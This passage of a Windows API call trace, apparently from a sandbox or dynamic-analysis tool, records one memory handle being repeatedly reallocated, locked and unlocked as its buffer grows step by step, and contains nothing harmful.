[0033.611] GlobalReAlloc (hMem=0xb40084, dwBytes=0x19e000, uFlags=0x2) returned 0xb40084 [0033.643] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0033.644] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0033.644] GlobalUnlock (hMem=0xb40084) returned 0 [0033.644] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1a0000, uFlags=0x2) returned 0xb40084 [0033.675] GlobalLock (hMem=0xb40084) returned 0x6d40020 [0033.676] GlobalHandle (pMem=0x6d40020) returned 0xb40084 [0033.676] GlobalUnlock (hMem=0xb40084) returned 0 [0033.676] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1a2000, uFlags=0x2) returned 0xb40084 [0033.709] GlobalLock (hMem=0xb40084) returned 0x6ef0020 [0033.710] GlobalHandle (pMem=0x6ef0020) returned 0xb40084 [0033.710] GlobalUnlock (hMem=0xb40084) returned 0 [0033.710] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1a4000, uFlags=0x2) returned 0xb40084 [0033.742] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0033.743] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0033.743] GlobalUnlock (hMem=0xb40084) returned 0 [0033.743] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1a6000, uFlags=0x2) returned 0xb40084 [0033.776] GlobalLock (hMem=0xb40084) returned 0x6d50020 [0033.777] GlobalHandle (pMem=0x6d50020) returned 0xb40084 [0033.777] GlobalUnlock (hMem=0xb40084) returned 0 [0033.777] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1a8000, uFlags=0x2) returned 0xb40084 [0033.810] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0033.811] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0033.811] GlobalUnlock (hMem=0xb40084) returned 0 [0033.811] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1aa000, uFlags=0x2) returned 0xb40084 [0033.844] GlobalLock (hMem=0xb40084) returned 0x6d50020 [0033.845] GlobalHandle (pMem=0x6d50020) returned 0xb40084 [0033.846] GlobalUnlock (hMem=0xb40084) returned 0 [0033.846] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1ac000, uFlags=0x2) returned 0xb40084 [0033.878] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0033.879] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0033.879] GlobalUnlock (hMem=0xb40084) returned 0 [0033.879] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1ae000, uFlags=0x2) returned 0xb40084 [0033.913] GlobalLock (hMem=0xb40084) returned 0x6d50020 [0033.914] GlobalHandle (pMem=0x6d50020) returned 0xb40084 [0033.914] GlobalUnlock (hMem=0xb40084) returned 0 [0033.914] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1b0000, uFlags=0x2) returned 0xb40084 [0033.948] GlobalLock (hMem=0xb40084) returned 0x6f00020 [0033.949] GlobalHandle (pMem=0x6f00020) returned 0xb40084 [0033.949] GlobalUnlock (hMem=0xb40084) returned 0 [0033.949] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1b2000, uFlags=0x2) returned 0xb40084 [0033.983] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0033.984] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0033.984] GlobalUnlock (hMem=0xb40084) returned 0 [0033.984] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1b4000, uFlags=0x2) returned 0xb40084 [0034.017] GlobalLock (hMem=0xb40084) returned 0x6d60020 [0034.018] GlobalHandle (pMem=0x6d60020) returned 0xb40084 [0034.018] GlobalUnlock (hMem=0xb40084) returned 0 [0034.019] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1b6000, uFlags=0x2) returned 0xb40084 [0034.064] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0034.065] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0034.065] GlobalUnlock (hMem=0xb40084) returned 0 [0034.065] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1b8000, uFlags=0x2) returned 0xb40084 [0034.099] GlobalLock (hMem=0xb40084) returned 0x6d60020 [0034.100] GlobalHandle (pMem=0x6d60020) returned 0xb40084 [0034.100] GlobalUnlock (hMem=0xb40084) returned 0 [0034.100] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1ba000, uFlags=0x2) returned 0xb40084 [0034.134] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0034.135] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0034.135] GlobalUnlock (hMem=0xb40084) returned 0 [0034.135] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1bc000, uFlags=0x2) returned 0xb40084 [0034.170] GlobalLock (hMem=0xb40084) returned 0x6d60020 [0034.171] GlobalHandle (pMem=0x6d60020) returned 0xb40084 [0034.171] GlobalUnlock (hMem=0xb40084) returned 0 [0034.171] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1be000, uFlags=0x2) returned 0xb40084 [0034.206] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0034.207] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0034.207] GlobalUnlock (hMem=0xb40084) returned 0 [0034.207] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1c0000, uFlags=0x2) returned 0xb40084 [0034.242] GlobalLock (hMem=0xb40084) returned 0x6d60020 [0034.243] GlobalHandle (pMem=0x6d60020) returned 0xb40084 [0034.243] GlobalUnlock (hMem=0xb40084) returned 0 [0034.243] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1c2000, uFlags=0x2) returned 0xb40084 [0034.278] GlobalLock (hMem=0xb40084) returned 0x6f30020 [0034.279] GlobalHandle (pMem=0x6f30020) returned 0xb40084 [0034.279] GlobalUnlock (hMem=0xb40084) returned 0 [0034.279] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1c4000, uFlags=0x2) returned 0xb40084 [0034.324] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0034.325] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0034.325] GlobalUnlock (hMem=0xb40084) returned 0 [0034.325] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1c6000, uFlags=0x2) returned 0xb40084 [0034.360] GlobalLock (hMem=0xb40084) returned 0x6d70020 [0034.361] GlobalHandle (pMem=0x6d70020) returned 0xb40084 [0034.361] GlobalUnlock (hMem=0xb40084) returned 0 [0034.361] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1c8000, uFlags=0x2) returned 0xb40084 [0034.396] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0034.397] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0034.397] GlobalUnlock (hMem=0xb40084) returned 0 [0034.397] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1ca000, uFlags=0x2) returned 0xb40084 [0034.432] GlobalLock (hMem=0xb40084) returned 0x6d70020 [0034.433] GlobalHandle (pMem=0x6d70020) returned 0xb40084 [0034.433] GlobalUnlock (hMem=0xb40084) returned 0 [0034.433] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1cc000, uFlags=0x2) returned 0xb40084 [0034.469] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0034.471] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0034.471] GlobalUnlock (hMem=0xb40084) returned 0 [0034.472] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1ce000, uFlags=0x2) returned 0xb40084 [0034.507] GlobalLock (hMem=0xb40084) returned 0x6d70020 [0034.508] GlobalHandle (pMem=0x6d70020) returned 0xb40084 [0034.508] GlobalUnlock (hMem=0xb40084) returned 0 [0034.508] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1d0000, uFlags=0x2) returned 0xb40084 [0034.543] GlobalLock (hMem=0xb40084) returned 0x6f40020 [0034.544] GlobalHandle (pMem=0x6f40020) returned 0xb40084 [0034.544] GlobalUnlock (hMem=0xb40084) returned 0 [0034.544] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1d2000, uFlags=0x2) returned 0xb40084 [0034.627] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0034.628] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0034.628] GlobalUnlock (hMem=0xb40084) returned 0 [0034.628] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1d4000, uFlags=0x2) returned 0xb40084 [0034.657] GlobalLock (hMem=0xb40084) returned 0x6d80020 [0034.658] GlobalHandle (pMem=0x6d80020) returned 0xb40084 [0034.658] GlobalUnlock (hMem=0xb40084) returned 0 [0034.658] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1d6000, uFlags=0x2) returned 0xb40084 [0034.694] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0034.695] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0034.695] GlobalUnlock (hMem=0xb40084) returned 0 [0034.695] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1d8000, uFlags=0x2) returned 0xb40084 [0034.730] GlobalLock (hMem=0xb40084) returned 0x6d80020 [0034.731] GlobalHandle (pMem=0x6d80020) returned 0xb40084 [0034.731] GlobalUnlock (hMem=0xb40084) returned 0 [0034.731] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1da000, uFlags=0x2) returned 0xb40084 [0034.768] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0034.769] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0034.769] GlobalUnlock (hMem=0xb40084) returned 0 [0034.769] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1dc000, uFlags=0x2) returned 0xb40084 [0034.816] GlobalLock (hMem=0xb40084) returned 0x6d80020 [0034.817] GlobalHandle (pMem=0x6d80020) returned 0xb40084 [0034.817] GlobalUnlock (hMem=0xb40084) returned 0 [0034.817] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1de000, uFlags=0x2) returned 0xb40084 [0034.855] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0034.856] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0034.856] GlobalUnlock (hMem=0xb40084) returned 0 [0034.856] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1e0000, uFlags=0x2) returned 0xb40084 [0034.892] GlobalLock (hMem=0xb40084) returned 0x6d80020 [0034.893] GlobalHandle (pMem=0x6d80020) returned 0xb40084 [0034.893] GlobalUnlock (hMem=0xb40084) returned 0 [0034.893] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1e2000, uFlags=0x2) returned 0xb40084 [0034.931] GlobalLock (hMem=0xb40084) returned 0x6f70020 [0034.932] GlobalHandle (pMem=0x6f70020) returned 0xb40084 [0034.932] GlobalUnlock (hMem=0xb40084) returned 0 [0034.932] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1e4000, uFlags=0x2) returned 0xb40084 [0034.969] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0034.970] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0034.970] GlobalUnlock (hMem=0xb40084) returned 0 [0034.970] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1e6000, uFlags=0x2) returned 0xb40084 [0035.007] GlobalLock (hMem=0xb40084) returned 0x6d90020 [0035.008] GlobalHandle (pMem=0x6d90020) returned 0xb40084 [0035.008] GlobalUnlock (hMem=0xb40084) returned 0 [0035.008] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1e8000, uFlags=0x2) returned 0xb40084 [0035.044] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0035.045] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0035.045] GlobalUnlock (hMem=0xb40084) returned 0 [0035.045] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1ea000, uFlags=0x2) returned 0xb40084 [0035.083] GlobalLock (hMem=0xb40084) returned 0x6d90020 [0035.084] GlobalHandle (pMem=0x6d90020) returned 0xb40084 [0035.084] GlobalUnlock (hMem=0xb40084) returned 0 [0035.084] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1ec000, uFlags=0x2) returned 0xb40084 [0035.121] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0035.122] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0035.122] GlobalUnlock (hMem=0xb40084) returned 0 [0035.122] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1ee000, uFlags=0x2) returned 0xb40084 [0035.160] GlobalLock (hMem=0xb40084) returned 0x6d90020 [0035.161] GlobalHandle (pMem=0x6d90020) returned 0xb40084 [0035.161] GlobalUnlock (hMem=0xb40084) returned 0 [0035.161] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1f0000, uFlags=0x2) returned 0xb40084 [0035.199] GlobalLock (hMem=0xb40084) returned 0x6f80020 [0035.200] GlobalHandle (pMem=0x6f80020) returned 0xb40084 [0035.200] GlobalUnlock (hMem=0xb40084) returned 0 [0035.200] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1f2000, uFlags=0x2) returned 0xb40084 [0035.238] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0035.239] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0035.239] GlobalUnlock (hMem=0xb40084) returned 0 [0035.239] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1f4000, uFlags=0x2) returned 0xb40084 [0035.277] GlobalLock (hMem=0xb40084) returned 0x6da0020 [0035.278] GlobalHandle (pMem=0x6da0020) returned 0xb40084 [0035.278] GlobalUnlock (hMem=0xb40084) returned 0 [0035.278] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1f6000, uFlags=0x2) returned 0xb40084 [0035.317] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0035.318] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0035.318] GlobalUnlock (hMem=0xb40084) returned 0 [0035.318] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1f8000, uFlags=0x2) returned 0xb40084 [0035.356] GlobalLock (hMem=0xb40084) returned 0x6da0020 [0035.357] GlobalHandle (pMem=0x6da0020) returned 0xb40084 [0035.357] GlobalUnlock (hMem=0xb40084) returned 0 [0035.357] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1fa000, uFlags=0x2) returned 0xb40084 [0035.408] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0035.409] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0035.409] GlobalUnlock (hMem=0xb40084) returned 0 [0035.410] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1fc000, uFlags=0x2) returned 0xb40084 [0035.449] GlobalLock (hMem=0xb40084) returned 0x6da0020 [0035.450] GlobalHandle (pMem=0x6da0020) returned 0xb40084 [0035.450] GlobalUnlock (hMem=0xb40084) returned 0 [0035.450] GlobalReAlloc (hMem=0xb40084, dwBytes=0x1fe000, uFlags=0x2) returned 0xb40084 [0035.488] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0035.489] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0035.489] GlobalUnlock (hMem=0xb40084) returned 0 [0035.489] GlobalReAlloc (hMem=0xb40084, dwBytes=0x200000, uFlags=0x2) returned 0xb40084 [0035.529] GlobalLock (hMem=0xb40084) returned 0x6da0020 [0035.530] GlobalHandle (pMem=0x6da0020) returned 0xb40084 [0035.530] GlobalUnlock (hMem=0xb40084) returned 0 [0035.531] GlobalReAlloc (hMem=0xb40084, dwBytes=0x202000, uFlags=0x2) returned 0xb40084 [0035.570] GlobalLock (hMem=0xb40084) returned 0x6fb0020 [0035.571] GlobalHandle (pMem=0x6fb0020) returned 0xb40084 [0035.571] GlobalUnlock (hMem=0xb40084) returned 0 [0035.571] GlobalReAlloc (hMem=0xb40084, dwBytes=0x204000, uFlags=0x2) returned 0xb40084 [0035.643] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0035.644] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0035.644] GlobalUnlock (hMem=0xb40084) returned 0 [0035.644] GlobalReAlloc (hMem=0xb40084, dwBytes=0x206000, uFlags=0x2) returned 0xb40084 [0035.683] GlobalLock (hMem=0xb40084) returned 0x6db0020 [0035.684] GlobalHandle (pMem=0x6db0020) returned 0xb40084 [0035.684] GlobalUnlock (hMem=0xb40084) returned 0 [0035.684] GlobalReAlloc (hMem=0xb40084, dwBytes=0x208000, uFlags=0x2) returned 0xb40084 [0035.724] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0035.725] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0035.725] GlobalUnlock (hMem=0xb40084) returned 0 [0035.725] GlobalReAlloc (hMem=0xb40084, dwBytes=0x20a000, uFlags=0x2) returned 0xb40084 [0035.765] GlobalLock (hMem=0xb40084) returned 0x6db0020 [0035.766] GlobalHandle (pMem=0x6db0020) returned 0xb40084 [0035.766] GlobalUnlock (hMem=0xb40084) returned 0 [0035.766] GlobalReAlloc (hMem=0xb40084, dwBytes=0x20c000, uFlags=0x2) returned 0xb40084 [0035.807] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0035.808] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0035.808] GlobalUnlock (hMem=0xb40084) returned 0 [0035.808] GlobalReAlloc (hMem=0xb40084, dwBytes=0x20e000, uFlags=0x2) returned 0xb40084 [0035.849] GlobalLock (hMem=0xb40084) returned 0x6db0020 [0035.850] GlobalHandle (pMem=0x6db0020) returned 0xb40084 [0035.850] GlobalUnlock (hMem=0xb40084) returned 0 [0035.850] GlobalReAlloc (hMem=0xb40084, dwBytes=0x210000, uFlags=0x2) returned 0xb40084 [0035.891] GlobalLock (hMem=0xb40084) returned 0x6fc0020 [0035.892] GlobalHandle (pMem=0x6fc0020) returned 0xb40084 [0035.892] GlobalUnlock (hMem=0xb40084) returned 0 [0035.892] GlobalReAlloc (hMem=0xb40084, dwBytes=0x212000, uFlags=0x2) returned 0xb40084 [0035.933] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0035.934] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0035.934] GlobalUnlock (hMem=0xb40084) returned 0 [0035.934] GlobalReAlloc (hMem=0xb40084, dwBytes=0x214000, uFlags=0x2) returned 0xb40084 [0035.976] GlobalLock (hMem=0xb40084) returned 0x6dc0020 [0035.977] GlobalHandle (pMem=0x6dc0020) returned 0xb40084 [0035.977] GlobalUnlock (hMem=0xb40084) returned 0 [0035.977] GlobalReAlloc (hMem=0xb40084, dwBytes=0x216000, uFlags=0x2) returned 0xb40084 [0036.018] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0036.019] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0036.019] GlobalUnlock (hMem=0xb40084) returned 0 [0036.019] GlobalReAlloc (hMem=0xb40084, dwBytes=0x218000, uFlags=0x2) returned 0xb40084 [0036.060] GlobalLock (hMem=0xb40084) returned 0x6dc0020 [0036.061] GlobalHandle (pMem=0x6dc0020) returned 0xb40084 [0036.061] GlobalUnlock (hMem=0xb40084) returned 0 [0036.061] GlobalReAlloc (hMem=0xb40084, dwBytes=0x21a000, uFlags=0x2) returned 0xb40084 [0036.103] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0036.104] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0036.104] GlobalUnlock (hMem=0xb40084) returned 0 [0036.104] GlobalReAlloc (hMem=0xb40084, dwBytes=0x21c000, uFlags=0x2) returned 0xb40084 [0036.145] GlobalLock (hMem=0xb40084) returned 0x6dc0020 [0036.147] GlobalHandle (pMem=0x6dc0020) returned 0xb40084 [0036.147] GlobalUnlock (hMem=0xb40084) returned 0 [0036.147] GlobalReAlloc (hMem=0xb40084, dwBytes=0x21e000, uFlags=0x2) returned 0xb40084 [0036.189] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0036.190] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0036.190] GlobalUnlock (hMem=0xb40084) returned 0 [0036.190] GlobalReAlloc (hMem=0xb40084, dwBytes=0x220000, uFlags=0x2) returned 0xb40084 [0036.231] GlobalLock (hMem=0xb40084) returned 0x6dc0020 [0036.232] GlobalHandle (pMem=0x6dc0020) returned 0xb40084 [0036.232] GlobalUnlock (hMem=0xb40084) returned 0 [0036.232] GlobalReAlloc (hMem=0xb40084, dwBytes=0x222000, uFlags=0x2) returned 0xb40084 [0036.273] GlobalLock (hMem=0xb40084) returned 0x6ff0020 [0036.274] GlobalHandle (pMem=0x6ff0020) returned 0xb40084 [0036.274] GlobalUnlock (hMem=0xb40084) returned 0 [0036.274] GlobalReAlloc (hMem=0xb40084, dwBytes=0x224000, uFlags=0x2) returned 0xb40084 [0036.316] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0036.317] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0036.317] GlobalUnlock (hMem=0xb40084) returned 0 [0036.317] GlobalReAlloc (hMem=0xb40084, dwBytes=0x226000, uFlags=0x2) returned 0xb40084 [0036.358] GlobalLock (hMem=0xb40084) returned 0x6dd0020 [0036.360] GlobalHandle (pMem=0x6dd0020) returned 0xb40084 [0036.360] GlobalUnlock (hMem=0xb40084) returned 0 [0036.360] GlobalReAlloc (hMem=0xb40084, dwBytes=0x228000, uFlags=0x2) returned 0xb40084 [0036.416] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0036.417] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0036.417] GlobalUnlock (hMem=0xb40084) returned 0 [0036.417] GlobalReAlloc (hMem=0xb40084, dwBytes=0x22a000, uFlags=0x2) returned 0xb40084 [0036.468] GlobalLock (hMem=0xb40084) returned 0x6dd0020 [0036.469] GlobalHandle (pMem=0x6dd0020) returned 0xb40084 [0036.469] GlobalUnlock (hMem=0xb40084) returned 0 [0036.469] GlobalReAlloc (hMem=0xb40084, dwBytes=0x22c000, uFlags=0x2) returned 0xb40084 [0036.511] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0036.512] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0036.512] GlobalUnlock (hMem=0xb40084) returned 0 [0036.512] GlobalReAlloc (hMem=0xb40084, dwBytes=0x22e000, uFlags=0x2) returned 0xb40084 [0036.554] GlobalLock (hMem=0xb40084) returned 0x6dd0020 [0036.555] GlobalHandle (pMem=0x6dd0020) returned 0xb40084 [0036.555] GlobalUnlock (hMem=0xb40084) returned 0 [0036.555] GlobalReAlloc (hMem=0xb40084, dwBytes=0x230000, uFlags=0x2) returned 0xb40084 [0036.600] GlobalLock (hMem=0xb40084) returned 0x7000020 [0036.601] GlobalHandle (pMem=0x7000020) returned 0xb40084 [0036.601] GlobalUnlock (hMem=0xb40084) returned 0 [0036.601] GlobalReAlloc (hMem=0xb40084, dwBytes=0x232000, uFlags=0x2) returned 0xb40084 [0036.644] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0036.645] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0036.645] GlobalUnlock (hMem=0xb40084) returned 0 [0036.645] GlobalReAlloc (hMem=0xb40084, dwBytes=0x234000, uFlags=0x2) returned 0xb40084 [0036.688] GlobalLock (hMem=0xb40084) returned 0x6de0020 [0036.689] GlobalHandle (pMem=0x6de0020) returned 0xb40084 [0036.689] GlobalUnlock (hMem=0xb40084) returned 0 [0036.689] GlobalReAlloc (hMem=0xb40084, dwBytes=0x236000, uFlags=0x2) returned 0xb40084 [0036.732] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0036.733] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0036.733] GlobalUnlock (hMem=0xb40084) returned 0 [0036.733] GlobalReAlloc (hMem=0xb40084, dwBytes=0x238000, uFlags=0x2) returned 0xb40084 [0036.776] GlobalLock (hMem=0xb40084) returned 0x6de0020 [0036.777] GlobalHandle (pMem=0x6de0020) returned 0xb40084 [0036.777] GlobalUnlock (hMem=0xb40084) returned 0 [0036.777] GlobalReAlloc (hMem=0xb40084, dwBytes=0x23a000, uFlags=0x2) returned 0xb40084 [0036.821] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0036.822] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0036.822] GlobalUnlock (hMem=0xb40084) returned 0 [0036.822] GlobalReAlloc (hMem=0xb40084, dwBytes=0x23c000, uFlags=0x2) returned 0xb40084 [0036.866] GlobalLock (hMem=0xb40084) returned 0x6de0020 [0036.867] GlobalHandle (pMem=0x6de0020) returned 0xb40084 [0036.867] GlobalUnlock (hMem=0xb40084) returned 0 [0036.867] GlobalReAlloc (hMem=0xb40084, dwBytes=0x23e000, uFlags=0x2) returned 0xb40084 [0036.910] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0036.911] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0036.911] GlobalUnlock (hMem=0xb40084) returned 0 [0036.911] GlobalReAlloc (hMem=0xb40084, dwBytes=0x240000, uFlags=0x2) returned 0xb40084 [0036.955] GlobalLock (hMem=0xb40084) returned 0x6de0020 [0036.956] GlobalHandle (pMem=0x6de0020) returned 0xb40084 [0036.956] GlobalUnlock (hMem=0xb40084) returned 0 [0036.956] GlobalReAlloc (hMem=0xb40084, dwBytes=0x242000, uFlags=0x2) returned 0xb40084 [0037.001] GlobalLock (hMem=0xb40084) returned 0x7030020 [0037.002] GlobalHandle (pMem=0x7030020) returned 0xb40084 [0037.002] GlobalUnlock (hMem=0xb40084) returned 0 [0037.002] GlobalReAlloc (hMem=0xb40084, dwBytes=0x244000, uFlags=0x2) returned 0xb40084 [0037.045] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0037.046] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0037.046] GlobalUnlock (hMem=0xb40084) returned 0 [0037.046] GlobalReAlloc (hMem=0xb40084, dwBytes=0x246000, uFlags=0x2) returned 0xb40084 [0037.091] GlobalLock (hMem=0xb40084) returned 0x6df0020 [0037.092] GlobalHandle (pMem=0x6df0020) returned 0xb40084 [0037.092] GlobalUnlock (hMem=0xb40084) returned 0 [0037.092] GlobalReAlloc (hMem=0xb40084, dwBytes=0x248000, uFlags=0x2) returned 0xb40084 [0037.136] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0037.138] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0037.138] GlobalUnlock (hMem=0xb40084) returned 0 [0037.138] GlobalReAlloc (hMem=0xb40084, dwBytes=0x24a000, uFlags=0x2) returned 0xb40084 [0037.183] GlobalLock (hMem=0xb40084) returned 0x6df0020 [0037.186] GlobalHandle (pMem=0x6df0020) returned 0xb40084 [0037.186] GlobalUnlock (hMem=0xb40084) returned 0 [0037.186] GlobalReAlloc (hMem=0xb40084, dwBytes=0x24c000, uFlags=0x2) returned 0xb40084 [0037.234] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0037.235] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0037.235] GlobalUnlock (hMem=0xb40084) returned 0 [0037.235] GlobalReAlloc (hMem=0xb40084, dwBytes=0x24e000, uFlags=0x2) returned 0xb40084 [0037.285] GlobalLock (hMem=0xb40084) returned 0x6df0020 [0037.286] GlobalHandle (pMem=0x6df0020) returned 0xb40084 [0037.286] GlobalUnlock (hMem=0xb40084) returned 0 [0037.286] GlobalReAlloc (hMem=0xb40084, dwBytes=0x250000, uFlags=0x2) returned 0xb40084 [0037.340] GlobalLock (hMem=0xb40084) returned 0x7040020 [0037.341] GlobalHandle (pMem=0x7040020) returned 0xb40084 [0037.341] GlobalUnlock (hMem=0xb40084) returned 0 [0037.341] GlobalReAlloc (hMem=0xb40084, dwBytes=0x252000, uFlags=0x2) returned 0xb40084 [0037.389] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0037.402] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0037.402] GlobalUnlock (hMem=0xb40084) returned 0 [0037.402] GlobalReAlloc (hMem=0xb40084, dwBytes=0x254000, uFlags=0x2) returned 0xb40084 [0037.449] GlobalLock (hMem=0xb40084) returned 0x6e00020 [0037.450] GlobalHandle (pMem=0x6e00020) returned 0xb40084 [0037.451] GlobalUnlock (hMem=0xb40084) returned 0 [0037.451] GlobalReAlloc (hMem=0xb40084, dwBytes=0x256000, uFlags=0x2) returned 0xb40084 [0037.500] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0037.501] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0037.501] GlobalUnlock (hMem=0xb40084) returned 0 [0037.501] GlobalReAlloc (hMem=0xb40084, dwBytes=0x258000, uFlags=0x2) returned 0xb40084 [0037.551] GlobalLock (hMem=0xb40084) returned 0x6e00020 [0037.552] GlobalHandle (pMem=0x6e00020) returned 0xb40084 [0037.552] GlobalUnlock (hMem=0xb40084) returned 0 [0037.552] GlobalReAlloc (hMem=0xb40084, dwBytes=0x25a000, uFlags=0x2) returned 0xb40084 [0037.603] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0037.604] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0037.604] GlobalUnlock (hMem=0xb40084) returned 0 [0037.604] GlobalReAlloc (hMem=0xb40084, dwBytes=0x25c000, uFlags=0x2) returned 0xb40084 [0037.657] GlobalLock (hMem=0xb40084) returned 0x6e00020 [0037.658] GlobalHandle (pMem=0x6e00020) returned 0xb40084 [0037.658] GlobalUnlock (hMem=0xb40084) returned 0 [0037.658] GlobalReAlloc (hMem=0xb40084, dwBytes=0x25e000, uFlags=0x2) returned 0xb40084 [0037.706] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0037.707] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0037.707] GlobalUnlock (hMem=0xb40084) returned 0 [0037.707] GlobalReAlloc (hMem=0xb40084, dwBytes=0x260000, 